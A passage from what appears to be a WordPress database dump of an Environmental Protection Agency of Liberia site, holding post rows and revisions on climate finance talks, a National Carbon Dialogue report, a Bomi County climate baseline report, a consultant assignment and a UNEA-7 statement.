/wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LIFT Initiative aims to unlock large-scale, long-term financing for climate adaptation and mitigation, while accelerating green growth. It supports countries to develop bankable climate projects, strengthen institutional capacity, and attract international investment aligned with national priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5663,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-02-at-13.41.04-1024x682.jpeg\" alt=\"\" class=\"wp-image-5663\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, reaffirmed Liberia’s readiness to partner with global institutions to deliver measurable climate results. He underscored the EPA’s commitment to ensuring Liberia fully benefits from LIFT by advancing a pipeline of high-impact, investment-ready projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The delegation commended Liberia’s proactive engagement. A representative of the Swedish Government noted, “Liberia has demonstrated strong willingness to participate meaningfully in LIFT, and we are encouraged by the EPA’s leadership.” GGGI officials added that their mission is to identify capable national institutions to drive implementation, emphasizing that “Liberia stands out as a promising partner for effective climate finance delivery.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA will continue close coordination with Sweden, GGGI, and relevant national stakeholders to translate this collaboration into tangible investments that build resilience, cut emissions, and create green jobs across Liberia. Further updates will be provided as the partnership progresses.</p>\n<!-- /wp:paragraph -->','EPA Hosts Swedish Government and GGGI for High-Level Talks on LIFT Climate Finance Initiative','','inherit','closed','closed','','5662-revision-v1','','','2025-12-03 14:08:51','2025-12-03 14:08:51','',5662,'https://ekmsliberia.info/?p=5665',0,'revision','',0),(5666,38,'2025-12-08 10:05:42','2025-12-08 10:05:42','<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"><!-- wp:heading {\"level\":4} -->\r\n<h4 class=\"wp-block-heading\"><strong>EXECUTIVE SUMMARY</strong></h4>\r\nThe Government of Liberia, through the National Climate Change Steering Committee (NCCSC)<strong>, </strong>convened a National Carbon Dialogue on 21–22 August 2025 in Ganta, Nimba County. The Dialogue was chaired by the Ministry of Finance and Development Planning (MFDP), by the Environmental Protection Agency (EPA) - co-chair I, and the Forestry Development Authority (FDA), co-chair II with the National Climate Change Secretariat (NCCS) serving as the NCCSC’s secretary and technical and operational arm. The event was financially and technically supported by the Government of Canada through NovaSphere, Measurement Reporting and Verification (MRV) for Climate Action, United Nations Development Program (UNDP), the European Union Delegation, Welthungerhilfe (WHH), Heritage Partners Associates, LLC (HPA), the Palladium Group implemented, Multi-stakeholder Forest Governance and Accountability Project (MFGAP), Flora and Fauna, the Embassy of the United Kingdom to Monrovia and others. The Dialogue provided a national platform to deliberate on key issues central to Liberia’s carbon governance framework, including carbon ownership and benefit- sharing, institutional arrangements, market mechanisms, grievance redress mechanism, and financial management.</div>\r\n<div> </div>\r\n<div class=\"column\"><!-- /wp:paragraph --> <strong>BACKGROUND AND CONTEXT</strong>\r\n<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">Liberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms. To address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','National Carbon Dialogue (NCD) Report','','publish','closed','closed','','national-carbon-dialogue-ncd-report','','','2025-12-08 10:22:04','2025-12-08 10:22:04','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5666',13,'document','',0),(5667,38,'2025-12-08 09:59:36','2025-12-08 09:59:36','','Screenshot 2025-12-08 at 09.56.51','','inherit','open','closed','','screenshot-2025-12-08-at-09-56-51','','','2025-12-08 09:59:36','2025-12-08 09:59:36','',5666,'https://ekmsliberia.info/wp-content/uploads/2025/12/Screenshot-2025-12-08-at-09.56.51.png',0,'attachment','image/png',0),(5668,38,'2025-12-08 10:02:47','2025-12-08 10:02:47','','Summary Report of the National Carbon Dialogue Report EPA October 2025 Final Report','','inherit','open','closed','','summary-report-of-the-national-carbon-dialogue-report-epa-october-2025-final-report','','','2025-12-08 10:02:47','2025-12-08 10:02:47','',5666,'https://ekmsliberia.info/wp-content/uploads/2025/12/Summary-Report-of-the-National-Carbon-Dialogue-Report-EPA-October-2025-Final-Report.pdf',0,'attachment','application/pdf',0),(5669,38,'2025-12-08 10:05:42','2025-12-08 10:05:42','<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>BACKGROUND AND CONTEXT</strong>\r\n<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nLiberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms.\r\n\r\nTo address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','National Carbon Dialogue (NCD) Report','','inherit','closed','closed','','5666-revision-v1','','','2025-12-08 10:05:42','2025-12-08 10:05:42','',5666,'https://ekmsliberia.info/?p=5669',0,'revision','',0),(5670,38,'2025-12-08 10:09:12','2025-12-08 10:09:12','<div class=\"page\" title=\"Page 11\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\n<!-- wp:heading {\"level\":4} -->\n<h4 class=\"wp-block-heading\">EXECUTIVE SUMMARY</h4>\n<!-- /wp:heading --> <!-- wp:paragraph -->\n\nThe Government of Liberia, through the National Climate Change Steering Committee (NCCSC)<strong>, </strong>convened a National Carbon Dialogue on 21–22 August 2025 in Ganta, Nimba County. The Dialogue was chaired by the Ministry of Finance and Development Planning (MFDP), by the Environmental Protection Agency (EPA) - co-chair I, and the Forestry Development Authority (FDA), co-chair II with the National Climate Change Secretariat (NCCS) serving as the NCCSC’s secretary and technical and operational arm. The event was financially and technically supported by the Government of Canada through NovaSphere, Measurement Reporting and Verification (MRV) for Climate Action, United Nations Development Program (UNDP), the European Union Delegation, Welthungerhilfe (WHH), Heritage Partners Associates, LLC (HPA), the Palladium Group implemented, Multi-stakeholder Forest Governance and Accountability Project (MFGAP), Flora and Fauna, the Embassy of the United Kingdom to Monrovia and others. The Dialogue provided a national platform to deliberate on key issues central to Liberia’s carbon governance framework, including carbon ownership and benefit- sharing, institutional arrangements, market mechanisms, grievance redress mechanism, and financial management.\n\n<!-- /wp:paragraph -->\n\n&nbsp;\n\n<strong>BACKGROUND AND CONTEXT</strong>\n<div class=\"page\" title=\"Page 11\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\nLiberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms.\n\nTo address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','National Carbon Dialogue (NCD) Report','','inherit','closed','closed','','5666-autosave-v1','','','2025-12-08 10:09:12','2025-12-08 10:09:12','',5666,'https://ekmsliberia.info/?p=5670',0,'revision','',0),(5671,38,'2025-12-08 10:09:29','2025-12-08 10:09:29','<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<!-- wp:heading {\"level\":4} -->\r\n<h4 class=\"wp-block-heading\">EXECUTIVE SUMMARY</h4>\r\nThe Government of Liberia, through the National Climate Change Steering Committee (NCCSC)<strong>, </strong>convened a National Carbon Dialogue on 21–22 August 2025 in Ganta, Nimba County. The Dialogue was chaired by the Ministry of Finance and Development Planning (MFDP), by the Environmental Protection Agency (EPA) - co-chair I, and the Forestry Development Authority (FDA), co-chair II with the National Climate Change Secretariat (NCCS) serving as the NCCSC’s secretary and technical and operational arm. The event was financially and technically supported by the Government of Canada through NovaSphere, Measurement Reporting and Verification (MRV) for Climate Action, United Nations Development Program (UNDP), the European Union Delegation, Welthungerhilfe (WHH), Heritage Partners Associates, LLC (HPA), the Palladium Group implemented, Multi-stakeholder Forest Governance and Accountability Project (MFGAP), Flora and Fauna, the Embassy of the United Kingdom to Monrovia and others. The Dialogue provided a national platform to deliberate on key issues central to Liberia’s carbon governance framework, including carbon ownership and benefit- sharing, institutional arrangements, market mechanisms, grievance redress mechanism, and financial management.\r\n\r\n<!-- /wp:paragraph -->\r\n\r\n<strong>BACKGROUND AND CONTEXT</strong>\r\n<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nLiberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms.\r\n\r\nTo address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','National Carbon Dialogue (NCD) Report','','inherit','closed','closed','','5666-revision-v1','','','2025-12-08 10:09:29','2025-12-08 10:09:29','',5666,'https://ekmsliberia.info/?p=5671',0,'revision','',0),(5672,38,'2025-12-08 10:10:01','2025-12-08 10:10:01','<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"><!-- wp:heading {\"level\":4} -->\r\n<h4 class=\"wp-block-heading\">EXECUTIVE SUMMARY</h4>\r\nThe Government of Liberia, through the National Climate Change Steering Committee (NCCSC)<strong>, </strong>convened a National Carbon Dialogue on 21–22 August 2025 in Ganta, Nimba County. The Dialogue was chaired by the Ministry of Finance and Development Planning (MFDP), by the Environmental Protection Agency (EPA) - co-chair I, and the Forestry Development Authority (FDA), co-chair II with the National Climate Change Secretariat (NCCS) serving as the NCCSC’s secretary and technical and operational arm. The event was financially and technically supported by the Government of Canada through NovaSphere, Measurement Reporting and Verification (MRV) for Climate Action, United Nations Development Program (UNDP), the European Union Delegation, Welthungerhilfe (WHH), Heritage Partners Associates, LLC (HPA), the Palladium Group implemented, Multi-stakeholder Forest Governance and Accountability Project (MFGAP), Flora and Fauna, the Embassy of the United Kingdom to Monrovia and others. The Dialogue provided a national platform to deliberate on key issues central to Liberia’s carbon governance framework, including carbon ownership and benefit- sharing, institutional arrangements, market mechanisms, grievance redress mechanism, and financial management.</div>\r\n<div> </div>\r\n<div class=\"column\"><!-- /wp:paragraph --> <strong>BACKGROUND AND CONTEXT</strong>\r\n<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">Liberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms. To address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','National Carbon Dialogue (NCD) Report','','inherit','closed','closed','','5666-revision-v1','','','2025-12-08 10:10:01','2025-12-08 10:10:01','',5666,'https://ekmsliberia.info/?p=5672',0,'revision','',0),(5673,38,'2025-12-08 10:10:48','2025-12-08 10:10:48','<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"><!-- wp:heading {\"level\":4} -->\r\n<h4 class=\"wp-block-heading\"><strong>EXECUTIVE SUMMARY</strong></h4>\r\nThe Government of Liberia, through the National Climate Change Steering Committee (NCCSC)<strong>, </strong>convened a National Carbon Dialogue on 21–22 August 2025 in Ganta, Nimba County. The Dialogue was chaired by the Ministry of Finance and Development Planning (MFDP), by the Environmental Protection Agency (EPA) - co-chair I, and the Forestry Development Authority (FDA), co-chair II with the National Climate Change Secretariat (NCCS) serving as the NCCSC’s secretary and technical and operational arm. The event was financially and technically supported by the Government of Canada through NovaSphere, Measurement Reporting and Verification (MRV) for Climate Action, United Nations Development Program (UNDP), the European Union Delegation, Welthungerhilfe (WHH), Heritage Partners Associates, LLC (HPA), the Palladium Group implemented, Multi-stakeholder Forest Governance and Accountability Project (MFGAP), Flora and Fauna, the Embassy of the United Kingdom to Monrovia and others. The Dialogue provided a national platform to deliberate on key issues central to Liberia’s carbon governance framework, including carbon ownership and benefit- sharing, institutional arrangements, market mechanisms, grievance redress mechanism, and financial management.</div>\r\n<div> </div>\r\n<div class=\"column\"><!-- /wp:paragraph --> <strong>BACKGROUND AND CONTEXT</strong>\r\n<div class=\"page\" title=\"Page 11\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">Liberia is at a critical juncture in advancing its climate governance and policy frameworks. As a Party to the Paris Agreement (PA) and a nation endowed with extensive forest resources—comprising a significant share of the Upper Guinea Forest—the country has both an obligation and an opportunity to leverage carbon as a national asset to address climate change while pursuing sustainable development. The Government of Liberia has undertaken several initiatives, including the adoption of a National Climate Change Policy and Response Strategy (2018), the development of its Nationally Determined Contributions (NDCs), and the implementation of the national REDD+ Strategy. However, gaps remain in institutional coordination, legal frameworks, monitoring and reporting systems, and benefit-sharing mechanisms. To address these gaps and to chart a clear path toward comprehensive carbon governance, the Government of Liberia convened a National Carbon Dialogue (Dialogue). The Dialogue was held on 21–22 August 2025 at the Peace Empire Hotel in Ganta, Nimba County. The Dialogue provided a national platform for stakeholders to deliberate on key issues related to carbon ownership, institutional arrangements, financial management, and market mechanisms, informing the drafting of a National Carbon Policy and laying the foundation for a future Climate Change Law.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','National Carbon Dialogue (NCD) Report','','inherit','closed','closed','','5666-revision-v1','','','2025-12-08 10:10:48','2025-12-08 10:10:48','',5666,'https://ekmsliberia.info/?p=5673',0,'revision','',0),(5674,38,'2025-12-08 10:43:23','2025-12-08 10:43:23','<!-- wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>EXECUTIVE SUMMARY</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Liberia, situated in West Africa, borders the North Atlantic Ocean and three neighboring countries: Guinea, Sierra Leone, and Ivory Coast. It covers 111,369 square kilometers, divided into 15 counties with various districts and clans. With a population of 5.2 million and a primarily agricultural economy, Liberia faces challenges due to climate change, exacerbated by its coastal vulnerability and reliance on climate- sensitive sectors. Climate change particularly impacts agriculture, fishing, mining, and forestry sectors.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>This climate change baseline report for Bomi County employed a mixed-method approach, including a literature review, focus group discussions, and key informant interviews, targeting individuals from different sectors at the county level. Climate data analysis utilized information from the Climate Change Knowledge Portal and the Coupled Model Intercomparison Project. Also, hazard information and data were acquired from ThinkHarzard!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Bomi has experienced a significant increase in population over the years, rising from 1,942 in 1984 to 84,119 in 2022. As a result, it is now the eleventh most populous county in the country. Bomi\'s livelihood includes small-scale rubber production, farming, small businesses, and artisanal diamond mining. Currently, iron ore mining by Western Cluster Liberia Limited also contributes to the economy. Despite these developments, poverty remains a significant challenge, with 64% of the population living below the poverty line. Employment opportunities are mainly in agriculture, with some involvement in mining and services. The migration trend in Bomi shows that young people move to urban centers such as Monrovia, influenced by economic opportunities. Bomi\'s cultural landscape is rich, with deep-rooted traditions such as storytelling, traditional dances, and rites of passage. Bomi\'s ethnic diversity comprises many groups, such as Gola, Dei, Mandinka, and Kpelle, each with its own language and cultural practices.</p>\r\n<!-- /wp:paragraph --><!-- /wp:paragraph -->','COUNTY CLIMATE CHANGE BASELINE REPORT (BOMI COUNTY)','','publish','closed','closed','','county-climate-change-baseline-report-bomi-county','','','2025-12-08 10:46:36','2025-12-08 10:46:36','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5674',12,'document','',0),(5675,38,'2025-12-08 10:40:53','2025-12-08 10:40:53','','Screenshot 2025-12-08 at 10.39.02','','inherit','open','closed','','screenshot-2025-12-08-at-10-39-02','','','2025-12-08 10:40:53','2025-12-08 10:40:53','',5674,'https://ekmsliberia.info/wp-content/uploads/2025/12/Screenshot-2025-12-08-at-10.39.02.png',0,'attachment','image/png',0),(5676,38,'2025-12-08 10:41:48','2025-12-08 10:41:48','','BOMI','','inherit','open','closed','','bomi','','','2025-12-08 10:41:48','2025-12-08 10:41:48','',5674,'https://ekmsliberia.info/wp-content/uploads/2025/12/BOMI.pdf',0,'attachment','application/pdf',0),(5679,38,'2025-12-08 10:46:36','2025-12-08 10:46:36','<!-- wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>EXECUTIVE SUMMARY</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Liberia, situated in West Africa, borders the North Atlantic Ocean and three neighboring countries: Guinea, Sierra Leone, and Ivory Coast. It covers 111,369 square kilometers, divided into 15 counties with various districts and clans. With a population of 5.2 million and a primarily agricultural economy, Liberia faces challenges due to climate change, exacerbated by its coastal vulnerability and reliance on climate- sensitive sectors. Climate change particularly impacts agriculture, fishing, mining, and forestry sectors.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>This climate change baseline report for Bomi County employed a mixed-method approach, including a literature review, focus group discussions, and key informant interviews, targeting individuals from different sectors at the county level. Climate data analysis utilized information from the Climate Change Knowledge Portal and the Coupled Model Intercomparison Project. Also, hazard information and data were acquired from ThinkHarzard!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Bomi has experienced a significant increase in population over the years, rising from 1,942 in 1984 to 84,119 in 2022. As a result, it is now the eleventh most populous county in the country. Bomi\'s livelihood includes small-scale rubber production, farming, small businesses, and artisanal diamond mining. Currently, iron ore mining by Western Cluster Liberia Limited also contributes to the economy. Despite these developments, poverty remains a significant challenge, with 64% of the population living below the poverty line. Employment opportunities are mainly in agriculture, with some involvement in mining and services. The migration trend in Bomi shows that young people move to urban centers such as Monrovia, influenced by economic opportunities. Bomi\'s cultural landscape is rich, with deep-rooted traditions such as storytelling, traditional dances, and rites of passage. Bomi\'s ethnic diversity comprises many groups, such as Gola, Dei, Mandinka, and Kpelle, each with its own language and cultural practices.</p>\r\n<!-- /wp:paragraph --><!-- /wp:paragraph -->','COUNTY CLIMATE CHANGE BASELINE REPORT (BOMI COUNTY)','','inherit','closed','closed','','5674-revision-v1','','','2025-12-08 10:46:36','2025-12-08 10:46:36','',5674,'https://ekmsliberia.info/?p=5679',0,'revision','',0),(5682,38,'2025-12-11 19:22:13','2025-12-11 19:22:13','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service Inclusive Finance Specialist (National Consultant)','','publish','closed','closed','','contractual-service-inclusive-finance-specialist-national-consultant','','','2025-12-12 07:40:12','2025-12-12 07:40:12','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5682',30,'ekms_bulletin','',0),(5683,38,'2025-12-11 18:46:55','2025-12-11 18:46:55','<!-- wp:paragraph -->\n<p>Nairobi, Kenya — Liberia urged decisive multilateral action to confront the intertwined crises of climate change, biodiversity loss, and pollution at the United Nations Environment Assembly (UNEA-7) on December 11, 2025, framing the moment as a test of global solidarity and leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the national statement, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency of Liberia, hailed Kenya’s stewardship of the summit and warned that planetary threats are already “lived realities.” He outlined Liberia’s domestic push to safeguard forests, strengthen climate resilience, and curb environmental degradation, highlighting the country’s Third Nationally Determined Contribution as its most ambitious climate pledge to date. Though Liberia’s emissions are small, he said, its determination is “mighty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called on UNEA-7 to chart a bold course that keeps warming within 1.5°C, reverses biodiversity loss, protects wetlands and coastlines, preserves glaciers, and tackles pollution in all forms. He urged member states to pair ambition with implementation finance, pressing donors and multilateral banks to simplify access to climate and nature funds, align lending with resilience goals, and scale support for adaptation. Partnerships with the private sector, he added, should include strong safeguards and local benefit-sharing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia placed intact tropical forests and frontline communities at the heart of global progress. The next phase of implementation, Dr. Yarkpawolo said, focuses on measurable outcomes: expanding protected and community-managed areas, upgrading forest monitoring and enforcement, and channeling climate finance directly to local stewards. Along the coast, where communities face sea-level rise and erosion, Liberia is prioritizing mangrove restoration and nature-based defenses alongside resilient infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On technology, the EPA chief backed responsible, ethical use of artificial intelligence to accelerate environmental monitoring, early-warning systems, conservation, and community empowerment—guarded by human values, equity, and sustainability. Liberia signaled support for UNEA-7 frameworks that promote beneficial AI while addressing privacy, bias, and access disparities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5685,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-11-at-18.01.24-768x1024.jpeg\" alt=\"\" class=\"wp-image-5685\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Inclusion was a central theme. Dr. Yarkpawolo urged the Assembly to embed the leadership of women and girls, persons with disabilities, local communities, Indigenous Peoples, youth, and children in decision-making, asserting that these groups are “essential to the solutions we seek.” He called for participatory monitoring, open environmental data, and accountability mechanisms to build trust and speed delivery.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delegates in Nairobi are considering resolutions spanning chemicals and waste, climate-health links, nature-positive economies, and AI governance. Liberia’s message echoed a growing consensus: integrated, justice-centered action is the only credible path to meeting 2030 goals. “The time for bold leadership is now,” Dr. Yarkpawolo concluded, reaffirming Liberia’s commitment to multilateralism and to working “hand-in-hand with all nations” for a safer, fairer, and more resilient future.</p>\n<!-- /wp:paragraph -->','Liberia calls for bold, inclusive global action at UNEA-7, spotlights forests, AI, and climate resilience','','publish','open','open','','liberia-calls-for-bold-inclusive-global-action-at-unea-7-spotlights-forests-ai-and-climate-resilience','','','2025-12-11 18:46:57','2025-12-11 18:46:57','',0,'https://ekmsliberia.info/?p=5683',34,'post','',0),(5684,38,'2025-12-11 18:45:12','2025-12-11 18:45:12','','ED pic','','inherit','open','closed','','ed-pic-2','','','2025-12-11 18:45:12','2025-12-11 18:45:12','',5683,'https://ekmsliberia.info/wp-content/uploads/2025/12/ED-pic.jpeg',0,'attachment','image/jpeg',0),(5685,38,'2025-12-11 18:46:06','2025-12-11 18:46:06','','WhatsApp-Image-2025-12-11-at-18.01.24','','inherit','open','closed','','whatsapp-image-2025-12-11-at-18-01-24','','','2025-12-11 18:46:06','2025-12-11 18:46:06','',5683,'https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-11-at-18.01.24.jpeg',0,'attachment','image/jpeg',0),(5686,38,'2025-12-11 18:46:37','2025-12-11 18:46:37','','WhatsApp Image 2025-12-11 at 18.01.25','','inherit','open','closed','','whatsapp-image-2025-12-11-at-18-01-25','','','2025-12-11 18:46:37','2025-12-11 18:46:37','',5683,'https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-11-at-18.01.25.jpeg',0,'attachment','image/jpeg',0),(5687,38,'2025-12-11 18:46:55','2025-12-11 18:46:55','<!-- wp:paragraph -->\n<p>Nairobi, Kenya — Liberia urged decisive multilateral action to confront the intertwined crises of climate change, biodiversity loss, and pollution at the United Nations Environment Assembly (UNEA-7) on December 11, 2025, framing the moment as a test of global solidarity and leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering the national statement, Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency of Liberia, hailed Kenya’s stewardship of the summit and warned that planetary threats are already “lived realities.” He outlined Liberia’s domestic push to safeguard forests, strengthen climate resilience, and curb environmental degradation, highlighting the country’s Third Nationally Determined Contribution as its most ambitious climate pledge to date. Though Liberia’s emissions are small, he said, its determination is “mighty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo called 